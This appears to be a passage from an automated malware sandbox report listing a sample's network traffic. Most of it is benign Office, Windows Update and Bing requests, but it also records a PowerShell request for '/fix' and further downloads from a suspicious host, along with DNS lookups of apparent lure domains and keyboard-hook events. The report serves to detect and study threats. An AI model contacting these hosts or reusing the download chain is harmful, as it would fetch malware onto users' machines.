              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+B9tRCMpyxZbAHy&MD=ALPwh7gA HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
              Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?42cef695cf34825c08a6cc7e3c1133fa HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?6908cf5a6c8bf9b4fcacb1c08ea6b6ec HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?568de8f0c345c91edba2d12d40b3074d HTTP/1.1host: dual-s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?0c0bf2d7d87519af818c03c75484f319 HTTP/1.1host: dual-s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global traffic HTTP traffic detected: GET /fix HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: apioeks.icu
                  Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /apis/wiRsh/jJZDv HTTP/1.1
                  User-Agent: Mozilla/5.0
                  Host: apioeks.icu
              Source: global traffic HTTP traffic detected: GET /apic/Qkqxz/EJDGUe HTTP/1.1
                  Host: apioeks.icu
              Source: global traffic DNS traffic detected: DNS query: gtoyorupaz.emlnk9.com
              Source: global traffic DNS traffic detected: DNS query: gtoyorupaz.activehosted.com
              Source: global traffic DNS traffic detected: DNS query: vstrrrlineproperrms.world
              Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global traffic DNS traffic detected: DNS query: www.google.com
              Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global traffic DNS traffic detected: DNS query: partner.booking.com
              Source: global traffic DNS traffic detected: DNS query: bstatic.com
              Source: global traffic DNS traffic detected: DNS query: cdn.cookielaw.org
              Source: global traffic DNS traffic detected: DNS query: munchkin.marketo.net
              Source: global traffic DNS traffic detected: DNS query: try.abtasty.com
              Source: global traffic DNS traffic detected: DNS query: code.jquery.com
              Source: global traffic DNS traffic detected: DNS query: apioeks.icu

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\System32\Narrator.exe Windows user hook set: Path: unknown Event Start: focus Event End: focus Module: NULL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\Narrator.exe
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 5128 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 5128 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
